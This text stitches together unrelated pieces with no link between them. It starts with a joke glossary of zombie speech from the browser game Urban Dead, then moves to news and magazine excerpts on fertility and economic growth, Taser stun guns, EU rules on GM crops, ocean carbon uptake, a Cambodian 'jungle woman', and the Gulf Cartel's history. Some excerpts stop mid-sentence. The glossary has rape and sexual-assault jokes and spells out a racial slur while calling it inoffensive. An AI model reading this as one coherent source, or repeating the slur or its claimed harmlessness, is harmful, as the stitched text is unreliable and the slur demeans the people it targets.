Marrah Barhahmaz an marrah Barhannagah - Seasonal greetings given by zombies visiting your safehouse .
It is an invitation to join in the winter holiday festivities .
WARNING : Zombie festivities often include the celebratory consumption of human flesh .
Habbah Granzah is expected to be the equivalent of Happy Kwanzaa .
Marrah ghrazmaz an hra habbah na haarh !
- Merry Christmas and a happy new year !
Bah - hambag - A show of dislike for holidays or holiday cheer , especially Christmas .
Often accompanied by smashing seasonal decorations .
Nah brabram - No problem .
Ram zah barragaz ?
Nah brabram !
Zangz -
Thanks !
The standard zombie word meant to express appreciation .
Sometimes used in coordinance with ' Nah Brabram '
Zarrah - " Sorry . "
Considered the polite thing to say if you ( accidentally or otherwise ) take a bite out of your fellow zed .
Suburb Names
Building Types
Building names begin with a root word for what the building is related to followed by barn , the word for building .
Thus , the literal translation would be root word - building , although each refers to a specific type of building .
Art
At least a few zombie players have taken the time to occasionally rattle off multiple lines of seeming gibberish that , when viewed by somebody who latter sees the entire speech , will form a picture .
The Minions of the Apocalypse pioneered this zombie art form , and it is unknown if it has spread outside that group .
Time
One of the most useful bits of information a zombie could communicate is the TIME at which a group should " ram an zmazh barragagz " .
Strangely , there so far seems to be no lexicon for this , or even much effort to communicate such info .
X:00 group / tactics center around the concept of in game co-ordination of attack times , and may lead to development / use of such a lexicon .
For now , here are some attempts at suggested phrases .
Zmazh barragagz !n an haar .
- " Smash the barricades in an hour " .
This means the zombie hopes to incite a barricade attack one hour from the time stamp given with the spoken expression .
Zmazh barragagz !n!!! haar .
" Smash the barricades in three hours " .
This means the zombie hopes to incite a barricade attack three hours from the time stamp given with the spoken expression .
Zmazh barragagz !n hab haar .
- " Smash the barricades in half hour " .
This means the zombie hopes to incite a barricade attack 30 minutes from the time stamp given with the spoken expression .
Miscellaneous
Any words that fit in none of the previous categories , often silly expressions with no important meaning .
Aaah mah gaz -
Oh my god .
An expression of shock amongst the undead that they 've been imitating from witnessing survivor usage while in their presence .
Typically used in the presence of headshotters , or a large group of harmanz .
an angry zombie says , " Hrah harh !
Harman zaz , ' aaah mah gaz , ZAHMBAHZ !!
Ran , RAN !'
Zahmbahz brang gangbang , hraaah ! "
Abba -
A disturbing number of zombies seem to enjoy this group and its music .
Abragababra - A magic intonation , often uttered before attempting to smash down a heavily barricaded building .
( See The Zombie Song Lyric Page entry )
Aga !n - Again .
Agrabah -
The central location in the popular Disney film Aladdin .
Agrabah 's ruler is the Sultan
The kingdom is constantly being rescued by its most famous residents Aladdin , Genie , Abu , Carpet , Iago and its very own Princess Jasmine .
Ahbgrag - Literally an upgrade , most often used to describe a change to the game .
Ahm rrahrh rrhnrrh ... - Apparently it means ' I 'm really lonely ' .
At least that 's what the zombie who uttered it said when asked .
Possibly a play off of the ol ' zombie song " Zah Rahnrrh , ah zah rahnrrh " .
Aman - " Amen " .
Used to indicate a prayer is completed , usually to Zombie Jesus , or " Zambah G-zaz " .
Ammmm - Ummmm .
Used when a thought oozes it's way through a decaying brain , but the zombie is n't sure what it is yet .
Anazarh - Another .
" Argh !
Annazarh bang bang man az haarh ! "
Angrah - " Angry " .
As in " Mah zambah am an angrah zambah . "
Being angry or not rarely alters a zombie 's propensity for violence ( which is generally high ) , yet this word sees significant use when a zombie 's plans go awry .
Argham - Arkham .
Can refer to either the Old or New variety .
Arghazzm -
This one 's rather obvious ( Hint : It 's Orgasm ) .
Arzhahm ! - Awesome !
An expression of the great wave of pleasure or satisfaction .
Az - As .
Azgaban -
The third novel of J.K. Rowling 's esteemed series is only just reaching Malton , for obvious reasons .
You can find it at your local Baagbarn .
The Zombese translation of the first book in the series , tentatively titled ' Harrah Baggah ahn za Zarzaraz Banana ' , is still pending .
Azz - Ass .
Often used with " ram " , " gangbang " , or " gramma " .
Azzbag - Cushion or seat .
" Grab an azzbag " is said before a Broadway Zombies performance to tell the audience that it is time to sit down and enjoy the show .
Azzbangarh - ( See Azzgrabbarz )
Azzgraahn - Assclown .
Some revivers are annoyed when zombies chat with others while waiting at revive points , and call them names .
Zombies think this is funny and taunt , " Harh Harh Harh !
Mah zambah am ah azzgraahn ! "
Azzgrabbarz - Zombie culture is n't unnecessarily fond of homosexuality , however , ramming bananaz in living harmanz azz is typically considered an invitation to the realm of Barhah .
With the roles reversed , it 's considered a heinous crime for a necrophiliac to dare attempt to molest a zombie .
Baamarang - Boomerang .
Beyond the weapon that returns , it may be advanced military tactics for zombies , essentially meaning " let 's leave and come back when humans have repopulated . "
Babah - Baby .
A low - level player .
Mostly refers to zambahz .
Zambahz use the Feeding Drag skill to help nourish their babah brazzahz an zazzahz .
Bah bah bah , Barbrah Ahn ! -
It seems that some zombies have an appreciation of the Beach Boys song Barbara Ann , as survivors have heard this phrase several times recently .
( see The Zombie Song Lyric Page entry )
Bahamaz - The Bahamas .
A favorite vacation destination for zombies .
Bahrang ... - Boring .
Often uttered by those waiting for a revive with no humans in sight .
Bam-mahbam - Suicide .
A compound word formed of the parts bam and mah .
Banana -
There are many uses for this word , almost all of which are obscene .
However , followers of Barhah consider the banana to be the holiest of fruits .
Bananarama -
The act by which a zombie rams a banana is at least one orifice of a survivor .
Bananabra !n - Crazy , stupid , or silly .
Serves as a generic insult of one 's intelligence , much as retard does in English .
Bang arh Bra!nz -
The zombie equivalent of the phrase Trick or treat .
It 's often heard around Halloween .
Bang - mahbang - Masturbation .
A compound word formed of the parts bang and mah .
Not to be confused with Bam - mahbam .
Barbaga zaarz - Barbecue sauce !
Even in the afterlife , zombies enjoy a topping for their foods other than human blood .
Barbara -
They 're coming to get you , Barbara !
Barbarh !an - A barbarian .
Could mean a human who results to what may be considered savage acts , such as combat revival , or a survivor who prefers the fire axe as a weapon .
Barg - Derived from bargarh .
Serves as a generic root word for eating .
It can be used as the verb " to eat " or in a compound word such as hambargarz .
It can also be used to mean a feast or banquet .
Barga !n - Bargain ;
Basically any harman inside a mall , especially one who dies shortly after the phase is used .
Barggrh - Compound word formed by barg ( to eat ) and grh ( speech ) .
This is the corresponding word for " feeding groan " .
Barggrharz becomes the imperative form .
Bargh - Barge .
As in , entering a safehouse .
Bazzang - A general expression of defiance or joy .
It is similar to the expressions " ca n't touch this " or " come and get it " .
Brabag - Breast .
Not a zombies ultimate goal , but always a welcome addition to one 's day .
Braaghbagh Maangan - Brokeback Mountain .
( See Azzgrabbarz )
Bragga - Bridge ( game ) some zombies prefer to spend their time keeping the few active brain cells they have in shape .
Bra!nz - Brains , sometimes food in general , and rarely survivors , when a zombie forgets the slightly less tasty parts .
Bran -
Like brains but harder to digest .
The food of choice for some elderly zombies .
Brang - Bring .
" Zahmbahz , harmanz brang bargarz ! "
Brazzahz - Literally brothers , but used to mean any fellow zombie , because zombies love each other on the same level as family .
" Mah zahmbah brazzahz ! "
See also " zazzahz "
Gabba gabba BANG -
The sound of a mouthy harman tripping over his own shotgun and shooting himself in the face .
Gabbann - God-damn .
Sacreligious invective , used as an interjection or as an adjective to indicate that the speaker dislikes something , as in : " Grab zha Gabbann bang bang man ! "
Gangbang - Just like the English gangbang .
Means rape or complete victory , almost always while in a group .
Garbahz - Meaning garbage , is sometimes used to refer to the Caiger Mall Survivors , also DARIS .
Ghargarh Mahh - Caiger Mall .
Grab -
Often used in a sexual manner , though with zombies now dragging wounded survivors out into the streets , this word has also been given new meaning .
( See : Orders )
Gramma - Grandma , short for Grandmother .
Sometimes used as a show of respect towards elderly , female zombies , much like papa or granba .
Grammar -
Not to be confused with " gramma . "
Apparently a peculiarly large number of zombies are former high school English teachers .
Granba - Grandpa or Grandfather .
" Zambahz grab granba nah gramma ! "
Habbabaghamaz - " Hippopotamus " .
A zombie favorite at the zoo , possibly because the animal smells worse than the zombie .
Habbagambaz - " Hippocampus " .
One of the tastiest parts of brains , according to some zombie connoseurs .
Habbah hangrah - Happy hungry !
The zombie version of ' bon appetit ! '
Growing usage as eat / eaten .
Haghz rh zambahz !
- Precedes a " hug " ( claw swipe ) of greeting among friendly zambahz within certain RRF strike teams .
Harrararah - Hallelujah .
As in , " Grarrah , grarrah harrararah "
Ham -
Some zombies enjoy ham ; may also be used to mean " him " , as in " Bangbang man !
Grab ham ! "
May also mean " home " , as in " Harmanz barraghagz mah ham agan !
Azzgrabarz ! "
Hambagh Rar!b - Combat Revive .
Not a popular tactic among barhah fundamentalists .
Hammarh - Hammer , alternative for zmazh .
" Hammarh zah barragaz ! "
Haarh - Here .
" Bang bang manz haarh ! "
Harmanbargarh -
This is the rattle equivalent of " brains " .
The literal translation is meant to be " human hamburgers " .
Harn -
Phone , cell phone , radio transmitter , bullhorn .
Literally " horn . "
Hazzah - A typical zombie cheer for victory .
Harrarh - Horror .
" Zah harrarh , zah harrarh ! "
Mah Barhah brangz zah zambahz zaa zah bazaar - " My Barhah brings all the zombies to the mall " Used as a song or taunt .
Mah naggahz ! - Relatively rare .
Seemingly used when a zombie is attempting to rap .
Mahgang gaar - " Mating Call " , specifically referring to a gang of Mrh Cows frantically mooing at a NT .
Mamba -
When a zombie tears down the barricades to a club and finds themselves on the dancefloor , they typically have a preference of mamba dancing .
Next to Michael Jackson's ' Thriller , ' of course .
Marh b!mb hazz ! - " More pimp hats . "
Some zombies like to encourage survivors to don stylish headwear .
Manbag - A handbag for men .
After the apocalypse , most men do n't care if they look girly if a piece of equipment is helpful to them .
Manbagz -
Not to be confused with " manbag " , manbagz are a common zombie expression for the male genitalia .
It is often paired with banana or grab .
Mangah - Munch , as in " Zahmbahz mangah harman branz ! "
Manham - See : " Azz "
Marharhahar - mother " fricker "
Marh - More , as in " Aaah mah gaz !
Marh bang bang manz ! " .
Marrh Zahrh - Title of the Mall Tour official singalong song .
Mazzagrh - Massacre .
" Harmanz mazzagrh mah brazzahz !
Nah Am angrah ! "
MG Hammarh - Often accompanied with a cry of " Ghahn zaghz zahz !
( Ca n't touch this ) " ; translates directly to the great MC Hammer .
Mmm ... - " Yum " or " Yummy " as in , " Harmanz branz arh mmm ... "
N!ggah - Friend , or sometimes African .
Unlike the English equivalent , it is not the least bit offensive or discriminatory , it 's just standard language .
Nahg - Need , as in " Mah zambah nahgz marh bra!nz ! " .
Usage can be with or without a pluralizing 'z ' .
Some zombies shun use of this word , preferring " maz hab " or , " must have " in place of " need " .
Naz - Nice .
" Mah zambah am an naz zambah .
Mah zambah am ganna hag harman . "
( " I am a nice zombie .
I am going to hug you . " )
N!ngah - Ninja .
With zombies , it refers to particularly stealthy or " znaagah " zombies .
With survivors , it seems to refer to " trenchcoaters " .
Rabah - Lover .
As in mah zambah rabah .
Rabbah - Rabbi .
Not to be confused with rabah ( see above )
Rabaz / Raghaz - to kick up a fuss ( ruckus )
Rabazaman - revolution
Ragh - Right .
Can be used as an affirmative , or as a negative , " nah ragh " .
Rarely used as a direction , as zombies prefer cardinal directions .
This preference may be due to zombies not having a word for " left " .
Ragnaragh - Zombie Ragnarok .
The battle at the end of the zombie world where all zombies fight bravely and meet their destiny .
Rah nah - ' Right Now ' .
Can also be used to mean ' today ' , to counter ' zahmarrah ' .
Rahg 'n Rahr - Rock and Roll
Ram -
Self explanatory .
Often used when giving an order to attack barricades , or harman azz .
Ram Ram -
An invitation by a zombie for a survivor to say " Who 's there ? " , to which the zombie will reply by making a joke or humorous statement about eating the survivor .
The practice is similar to making knock - knock jokes .
Razz !a - raid , crackdown , round - up
Rh !bz -
One of the tastiest parts of the harmanz .
Rrrrh Mrh - Revive Me
Zaghana - A rather crude term for a female reproductive organ .
Commonly heard outside Nichols and Tynte Malls by zombies of the RRF .
Zagz - Another crude term for sexual intercourse
Zahah - Uh-huh .
Zahmarrah - Tomorrow , tomorrow , we 'll eat ya , tomorrow !
Zahnz - " Dance " .
Often seen as a command or a challenge to other zambahz , followed by flailing gesture dance moves .
A favorite pastime of the RRF Gore Corps , especially while at revive points .
( See Dance Routine )
Zahz - Says , as in Mah zambah zahz nah .
Zambargah - Zombarchy , i.e. a government of zombies .
It should be noted that attempts to discuss politics with a zombie will most likely end in your brain being eaten .
Zamrhm - Poetry .
Unknown as to whether this refers to all poetry or just zombie poetry .
Zang Song .
Z!ng -
To sing .
Zombies tend to attempt this more than survivors , who see more success .
Go figure .
Zargar - Zerger .
Generally exclaimed when a zombie sees two similarly named characters next to each other in the room description or a known zerger .
Will most likely be followed by the accused being taunted and eaten ( See : Zargar Bargarz ) , and then a cheer ( See : Hazzah ) .
Zargar Bargarz - Zerger burgers .
The result of two similarly named characters being discovered by a horde of zombies , along with a generous addition of toppings .
Zazzah - Literally sister , but used to mean any female zombie , because zombies love each other on the same level as family .
It seems that even zombies have a concept of political correctness , and are often heard referring to their " zambah brazzahz ahn zazzahz " .
Zbah - Spy .
Zbam - Spam .
Zgaarah - Scary .
Zhaar - Share .
When they need n't the XP , zombies often selflessly donate a dying survivors to the babahz .
Zhabbang - Shopping .
Often a reference to a mall assault , and less often with needed " zhabbang bagz " .
Zhhhhaaaaaaaaaaaaaaannnnnnn !! -
A zombie 's cry of anguish .
Typically accompanied with arms raised to the sky and head tilted back .
Also seen as Ghhhaaaaaaaaaaannnnnnn !!!!!!
Zharam - Serum .
The contents of a revivification syringe .
Zharazahra - Territory .
zombies are very particular about who comes on their turf .
Expect lots of ramming , bananas , and azz , not necessarily in that order if they " grab " you on it .
Zmargazbarg - Smorgasbord .
A feast in which harmanz are the main course .
Usually uttered in delight after breaking into a safe house filled with babah ( newbie ) harmanz .
Note the appropriate usage of the suffix " Barg . "
Zmazh - Smash .
Alternative for ram , and hammarh .
Used less for barricades and more for survivors or even establishments .
Zmazh Marzan !
Znaagah - Sneaky .
" Znaagah harmanz barragagz zah haz an ranz . "
Zzzz - Sleeping or swaying .
May be used as a way of saying ( s ) he 's about to run out of Action Points .
Verb Conjugation
Given the limits of the Zombie vocabulary , most verbs maintain a single form throughout all tenses and numbers of persons .
Detail concerning the time and performer or recipient of an action can therefore often be discovered only by careful attention to context .
The chart below gives an example of this tendency of the language of the walking dead .
Typical Death Rattle Verb Conjugation Verb Tense Conjugation Death Rattle Example Translation Past Simple haz + verb " Ah haz ran ahn Ragrabang . "
" I went to Ridleybank . "
Present verb " Ah ran ahn Ragrabang . "
" I go to Ridleybank . "
Future Simple ganna + verb " Mah zambah ganna ran ahn Ragrabang . "
" I will go to Ridleybank . "
Treatise on Zombie Grammar
Enterprising linguists here in Malton have produced a body of work , a treatise on Zombie Grammar , which can be found here : Zamgrh .
For the more enterprising students of Zombese , this will prove an invaluable tool .
The Economists looks at recent declines in fertility discusses current projections of world population , and how changes in a country ’s demographic structure shape its economic development ( but it does n’t mention the role of urbanization ) .
In Fertility and living standards it writes :
Sometime in the next few years ( if it has n’t happened already ) the world will reach a milestone : half of humanity will be having only enough children to replace itself .
That is , the fertility rate of half the world will be 2.1 or below .
This is the “ replacement level of fertility ” , the magic number that causes a country ’s population to slow down and eventually to stabilise .
According to the United Nations population division , 2.9 billion people out of a total of 6.5 billion were living in countries at or below this point in 2000 - 05 .
The number will rise to 3.4 billion out of 7 billion in the early 2010s and to over 50 % in the middle of the next decade .
The countries include not only Russia and Japan but Brazil , Indonesia , China and even south India .
The move to replacement - level fertility is one of the most dramatic social changes in history .
It manifested itself in the violent demonstrations by students against their clerical rulers in Iran this year .
It almost certainly contributed to the rising numbers of middle - class voters who backed the incumbent governments of Indonesia and India .
It shows up in rural Malaysia in richer , emptier villages surrounded by mechanised farms .
And everywhere , it is changing traditional family life by enabling women to work and children to be educated .
At a time when Malthusian alarms are ringing because of environmental pressures , falling fertility may even provide a measure of reassurance about global population trends . …
Higher standards of living , then , reduce fertility .
And lower fertility improves living standards .
This is what China ’s government says .
It is also the view that has emerged from demographic research over the past 20 years .
In the 1980s , population was regarded as relatively unimportant to economic performance .
American delegates told a UN conference in 1984 that “ population growth is , in and of itself , neither good nor bad ; it is a neutral phenomenon . ”
Recent research suggests otherwise .
Cutting the fertility rate from six to two can help an economy in several ways .
First , as fertility falls it changes the structure of the population , increasing the size of the workforce relative to the numbers of children and old people .
When fertility is high and a country is young ( median age below 20 ) , there are huge numbers of children and the overall dependency ratio is high .
When a country is ageing ( median age above 40 ) , it again has a high dependency ratio , this time because of old people .
But the switch from one to the other produces a Goldilocks generation .
Because fertility is falling , there are relatively few children .
Because of high mortality earlier , there are relatively few grandparents .
Instead , countries have a bulge of working - age adults .
This happened to Europe after the baby boom of 1945 - 65 and produced les trente glorieuses ( 30 years of growth ) .
It is happening now in Asia and Latin America .
East Asia has done better than Latin America , showing that lower fertility alone does not determine economic success .
Eventually developing countries will face the same problems of ageing as Europe and Japan do .
But for the moment , Asians and Latinos are enjoying fertility that is neither too hot , nor too cold .
According to David Bloom of the Harvard School of Public Health , the “ demographic dividend ” ( his term ) accounted for a third of East Asian growth in 1965 - 90 .
Slowing fertility has other benefits .
By making it easier for women to work , it boosts the size of the labour force .
Because there are fewer dependent children and old people , households have more money left for savings , which can be ploughed into investment .
Chinese household savings ( obviously influenced by many things , not just demography ) reached almost 25 % of GDP in 2008 , helping to finance investment of an unprecedented 40 % of GDP .
This in turn accounted for practically all the increase in Chinese GDP in the first half of this year .
Lastly , low fertility makes possible a more rapid accumulation of capital per head .
To see how , think about what happens to a farm as it is handed down the generations in a country without primogeniture .
The more children there are , the more the farm is divided .
Eventually , these patches become so tiny they cease to be efficient . …
This link between growth and fertility raises awkward questions .
In the 1980s the link was downplayed in reaction to Malthusian alarms of the 1970s , when it was fashionable to argue that population growth had to be reined in because oil and natural resources were running short .
So if population does matter after all , does that mean the Malthusians were right ?
Not entirely .
Neo -Malthusians think the world has too many people .
But for most countries , the population questions that matter most are either : do we have enough people to support an ageing society ?
Or : how can we take advantage of having just the right number for economic growth ?
It is fair to say that these perceptions are not mutually exclusive .
The world might indeed have the right numbers to boost growth and still have too many for the environment .
The right response to that , though , would be to curb pollution and try to alter the pattern of growth to make it less resource - intensive , rather than to control population directly .
The reason is that widening replacement - level fertility means population growth is slowing down anyway .
A further reduction of fertility would be possible if family planning were spread to the parts of the world which do not yet have it ( notably Africa ) .
But that would only reduce the growth in the world ’s numbers from 9.2 billion in 2050 to , say , 8.5 billion .
To go further would probably require draconian measures , such as sterilisation or one - child policies .
The bad news is that the girls who will give birth to the coming , larger generations have already been born .
The good news is that they will want far fewer children than their mothers or grandmothers did .
YOU know you have made it when the name of your firm mutates into a verb , as with Google and Hoover .
A recent addition to this select group is Taser International .
To be “ tasered ” is to be briefly paralysed by an electrically charged dart fired from one of the firm 's stun guns , usually by police seeking to pacify someone without resort to firearms .
But the firm hopes it will soon come to mean much more .
The device 's success has been electrifying .
In the 15 years since it first came on the market , it has become an essential bit of kit .
It is used by 14,000 of the 18,000 law - enforcement agencies in America , along with many foreign ones .
“ Half the cops in America carry a Taser as well as a gun , ” says Rick Smith , Taser 's boss .
Having come to dominate what Mr Smith calls the “ less - lethal weapon space ” , Taser has begun a burst of rapid - fire innovation that could , he believes , turn it into a business with sales of $ 1 billion a year — ten times its current size .
Last June it launched the XREP ( extended range electronic projectile ) , a wireless device that can be fired from a shotgun to zap someone up to 100 feet ( 30 metres ) away .
Unlike the pinprick caused by the original wired dart , which has a range of up to 35 feet , “ this will leave an ugly mark , but it wo n't kill you , ” says Mr Smith .
In November it launched the X3 , a semi-automatic stun - gun that allows three shots , “ in case the first one misses ” .
The biggest innovation , however , has been sparked by the controversy Tasers cause .
In November there was outcry after a 10 - year - old American girl was tasered by police called in by her mother when she refused to take a shower .
Police have so often been accused of using Tasers gratuitously that the firm started fitting them with digital cameras that recorded every firing .
This “ Taser - cam ” got the firm 's boffins thinking : why not equip police with cameras that can record entire incidents ( not just the brief moment when a Taser is used ) and even beam the recordings instantly back to the higher - ups at headquarters ?
The result is a “ tactical on - officer network computer ” called AXON , which is being tested by several police forces in America .
Recordings are uploaded to a restricted website , evidence.com , to be viewed by approved personnel .
Mr Smith says that the creation of a sort of “ secure YouTube of global law enforcement ” could be beneficial both for the public , who would get more accountable police , and for officers on the beat , who could be vindicated more quickly if falsely accused of brutality .
But the biggest winner would be Taser , which expects to charge $ 1,700 for the hardware , plus $ 99 per device per month to manage all the data .
Zero tolerance does n’t help ( Image : Mychele Daniau / Getty )
GENETICALLY modified crops are everywhere , it seems – even in Europe .
Strict laws designed to keep the European Union free of unauthorised GM crops and products are not working , and are posing problems for the EU ’s € 150 billion livestock industry , according to farmers ’ representatives .
They say that supplies of animal feed for poultry and pigs are being refused entry at European ports when found to contain even trace amounts of unauthorised GM material .
Under Europe ’s “ zero - tolerance ” laws on GM contamination , introduced in 2007 , the presence of even a few seeds of unauthorised GM …
Lets be real we all know who the light heavyweight champion will be next year
The oceans play a key role in regulating climate , absorbing more than a quarter of the carbon dioxide that humans put into the air .
Now , the first year - by - year accounting of this mechanism during the industrial era suggests the oceans are struggling to keep up with rising emissions -- a finding with potentially wide implications for future climate .
The study appears in the November 19 issue of the journal Nature .
The researchers estimate that the oceans last year took up a record 2.3 billion tons of CO 2 produced from burning of fossil fuels .
But with overall emissions growing rapidly , the proportion of fossil - fuel emissions absorbed by the oceans since 2000 may have declined by as much as 10 % .
Some climate models have already predicted such a slowdown in the oceans ' ability to soak up excess carbon from the atmosphere , but this is the first time scientists have actually measured it .
Models attribute the change to depletion of ozone in the stratosphere and global warming - induced shifts in winds and ocean circulation .
But the new study suggests the slowdown is due to natural chemical and physical limits on the oceans ' ability to absorb carbon -- an idea that is now the subject of widespread research by other scientists .
" The more carbon dioxide you put in , the more acidic the ocean becomes , reducing its ability to hold CO 2 " said the study 's lead author , Samar Khatiwala , an oceanographer at Columbia University 's Lamont - Doherty Earth Observatory .
" Because of this chemical effect , over time , the ocean is expected to become a less efficient sink of manmade carbon .
The surprise is that we may already be seeing evidence for this , perhaps compounded by the ocean 's slow circulation in the face of accelerating emissions . "
The study reconstructs the accumulation of industrial carbon in the oceans year by year , from 1765 to 2008 .
Khatiwala and his colleagues found that uptake rose sharply in the 1950s , as the oceans tried to keep pace with the growth of carbon dioxide emissions worldwide .
Emissions continued to grow , and by 2000 , reached such a pitch that the oceans have since absorbed a declining overall percentage , even though they absorb more each year in absolute tonnage .
Today , the oceans hold about 150 billion tons of industrial carbon , the researchers estimate -- a third more than in the mid-1990s .
For decades , scientists have tried to estimate the amount of manmade carbon absorbed by the ocean by teasing out the small amount of industrial carbon -- less than 1 percent -- from the enormous background levels of natural carbon .
Because of the difficulties of this approach , only one attempt has been made to come up with a global estimate of how much industrial carbon the oceans held -- for a single year , 1994 .
advertisement
Khatiwala and his colleagues came up with another method .
Using some of the same data as their predecessors -- seawater temperatures , salinity , manmade chlorofluorocarbons and other measures -- they developed a mathematical technique to work backward from the measurements to infer the concentration of industrial carbon in surface waters , and its transport to deep water through ocean circulation .
This allowed them to reconstruct the uptake and distribution of industrial carbon in the oceans over time .
Their estimate of industrial carbon in the oceans in 1994 -- 114 billion tons -- nearly matched the earlier 118 billion - ton estimate , made by Chris Sabine , a marine chemist at the National Oceanic and Atmospheric Organization in a 2004 paper in the journal Science .
Sabine , who was not involved in the new study , said he saw some limitations .
For one , he said , the study assumes circulation has remained steady , along with the amount of organic matter in the oceans .
" That being said , I still think this is the best estimate of the time variance of anthropogenic CO 2 in the ocean available , " said Sabine .
" Our previous attempts to quantify anthropogenic CO 2 using ocean data have only been able to provide single snapshots in time . "
About 40 percent of the carbon entered the oceans through the frigid waters of the Southern Ocean , around Antarctica , because carbon dioxide dissolves more readily in cold , dense seawater than in warmer waters .
From there , currents transport the carbon north .
" We 've suspected for some time that the Southern Ocean plays a critical role in soaking up fossil fuel CO 2 , " said Khatiwala .
" But our study is the first to quantify the importance of this region with actual data . "
The researchers also estimated carbon uptake on land , by taking the known amount of fossil - fuel emissions and subtracting the oceans ' uptake and the carbon left in the air .
They were surprised to learn that the land may now be absorbing more than it is giving off .
They say that until the 1940s , the landscape produced excess carbon dioxide , possibly due to logging and the clearing and burning of forests for farming .
Deforestation and other land - use changes continue at a rapid pace today -- but now , each year the land appears to be absorbing 1.1 billion tons more carbon than it is giving off .
One possible reason for the reversal , say the researchers , is that now , some of the extra atmospheric carbon -- raw material for photosynthesis -- may be feeding back into living plants and making them grow faster .
" The extra carbon dioxide in the atmosphere may be providing a fertilizing effect , " said study coauthor Timothy Hall , a senior scientist at NASA 's Goddard Institute for Space Studies .
Many other scientists are now working to determine the possible effects of increased carbon dioxide on plant growth , and incorporate these into models of past and future climates .
Khatiwala says there are still large uncertainties , but in any case , natural mechanisms cannot be depended upon to mitigate increasing human - produced emissions .
" What our ocean study and other recent land studies suggest is that we cannot count on these sinks operating in the future as they have in the past , and keep on subsidizing our ever - growing appetite for fossil fuels , " he said .
CAMBODIA'S " jungle woman ' ' , whose story gripped the country after she apparently spent 18 years living in a forest , has begun speaking normally instead of making animal - type noises , her father said .
Rochom P'ngieng , now 28 , went missing as a little girl in 1989 while herding water buffalo in Ratanakkiri province around 600 km northeast of the capital Phnom Penh .
In early 2007 the woman was brought from the jungle , naked and dirty , after being caught trying to steal food from a farmer .
She was hunched over like a monkey , scavenging on the ground for pieces of dried rice .
She could not utter a word of any intelligible language , instead making what Sal Lou , the man who says he is her father , calls " animal noises . ''
Cambodians described her as " jungle woman ' ' and " half - animal girl ' ' and since rejoining society Rochom P'ngieng has battled bouts of illness and was put in hospital in October after refusing food .
But Sal Lou said late yesterday that this month his daughter had started to understand Cambodia 's Khmer language and could even speak the language of his ethnic Phnong tribe .
" She is becoming a normal human being like others .
She has been starting to speak out now - she speaks the language of Phnong , '' Sal Lou said .
" She can ask for food , water and so on when she feels hungry , '' he said .
The apparent breakthrough happened after Rochom P'ngieng 's hospitalisation , when doctors gave her injections to treat a nervous illness for a few days , Sal Lou said .
" She is very gentle and I am very happy with her progress , '' he said adding that her condition appears to be improving from day to day .
Sal Lou said his daughter had stopped trying to flee into the jungle as she had in the past .
" Even though we tried to take her into jungle , she wanted to stay at home , '' he said , adding that she is able to eat food now .
The jungles of Ratanakkiri - some of the most isolated and wild in Cambodia - are known to have held hidden groups of hill tribes in the recent past .
In November 2004 , 34 people from four hill tribe families emerged from the dense forest where they had fled in 1979 after the fall of the genocidal Khmer Rouge regime , which they supported .
Ronald Reagan was in the White House .
Eye of the Tiger was on the radio .
Cocaine cowboys roamed Miami .
And the seeds for what would become perhaps the largest and most powerful crime syndicate in the hemisphere were quietly being sowed in Houston .
It was 1982 , and William Hoffman , an American drug runner later tucked into the witness - protection program , was busy using rental cars to ferry 25 - pound loads of Mexican marijuana from Brownsville to Houston .
Hoffman , records show , would drive to a house on Houston 's Wallisville Road , where guys he knew only as “ Guero ” and “ Gringo ” would unload the pot .
But small - time was about to become big - time .
Through interviews , documents , and court testimony , the Houston Chronicle has reconstructed the origins of a tenacious syndicate which over 25 years rose from a borderland gang of pot smugglers and car thieves to a multibillion - dollar criminal empire known as the Gulf Cartel .
Hoffman 's own words , offered in testimony , provide a vivid street - level look at how — as Colombia 's mighty cocaine cartels had to abandon Miami and find a way to do business elsewhere in the United States — the stage was set for explosive growth among Mexico 's drug gangsters who made Houston a national hub as they sought to infiltrate the United States .
“ As the heat came on in Miami in the early 1980s , they started to switch their routes , ” recalled Peter Hanna , a senior FBI agent who made a career chasing the cartel .
“ The Mexicans said , ‘ Hey , no problem , we have been smuggling stuff into the United States for years . ' ”
Keeping a lower profile on U.S. soil than Colombians , who were as bold as they were extravagant , the Mexicans made money hand over fist .
Despite a quarter century of indictments and arrests of its leaders , and seizures of its drugs , cash and guns , the cartel has repeatedly reinvented itself to thrive at unprecedented levels .
As one federal intelligence agent put it , the Gulf Cartel has grown so quickly that it stands apart from other Mexican gangs and has clearly graduated from door - greeter to superstore - owner , with its territory the swath of Texas border stretching from the Gulf of Mexico westward to Big Bend .
The cartel pumps dope through pipelines connecting Latin America to Houston , and on to Atlanta , Chicago , Miami , New York and elsewhere .
And when drugs are being smoked , snorted or swallowed here , the Drug Enforcement Administration contends they have been sifted through the cartel 's fingers .
“ I do n't care where cocaine is in Houston , the Gulf Cartel owned it , touched it or got a cut from it — without question , ” said Wendell Campbell , spokesman for the DEA 's Houston Field Division .
“ Without question . ”
While Hoffman , one of the few Americans in the organization , smuggled marijuana in the early 1980s , more than 1,000 miles away U.S. authorities used planes and boats to blitz the Caribbean Sea and deny Colombian cartels a primary route for pumping cocaine northward .
Washington was at the same time going after now - legendary Pablo Escobar and other Colombian drug lords by seeking to have them sent to the U.S. to face justice .
First kilos , then tons
Desperate to deliver their product , Colombian capos cut deals with longtime Mexican smugglers to move bricks of cocaine , worth more than their weight in gold , along routes Mexicans used to sneak bale - size loads of marijuana , authorities say .
By 1986 , Hoffman , who could n't speak Spanish but used his Mexican wife as a translator , was smuggling Cali - Cartel brand cocaine for the boys from south of the border .
Kilos became tons , and thousands of dollars became millions in profits .
“ The money got to be too good , ” Hoffman testified .
The cartel 's first known Fort Knox on U.S. soil was found in 1989 at a Rio Grande Valley home complete with an orchard and an underground vault buried beneath a few inches of dirt , topped by a chicken coop .
Authorities found a staggering 9 tons of cocaine worth at least $ 200 million in South Texas at the time , and 10 times that on the East Coast .
That same year Hoffman parked a Chevrolet Suburban at William P. Hobby Airport , keys hidden in the gas cap , and $ 10 million stuffed in a secret compartment to be driven to the border , records show .
Besides transporting cocaine across Mexico for the Colombians , Mexican syndicates took over smuggling and U.S. street - level distribution .
According to a 2009 Justice Department report , “ National Drug Threat Assessment , ” Mexico 's major cartels now have a presence in at least 230 U.S. cities , from Kalamazoo , Mich. , to Dodge City , Kan .
Billions in proceeds
While there are four or five major Mexican cartels , the Gulf Cartel is consistently considered at the top of the industry .
The National Drug Intelligence Center estimates Mexican and Colombian cartels “ generate , remove and launder ” between $ 18 billion and $ 39 billion in wholesale proceeds each year .
Two generations of Gulf Cartel crime bosses — as well as their henchmen , accountants , confidants , wannabes , snitches and soldiers — have been brought to justice in Houston .
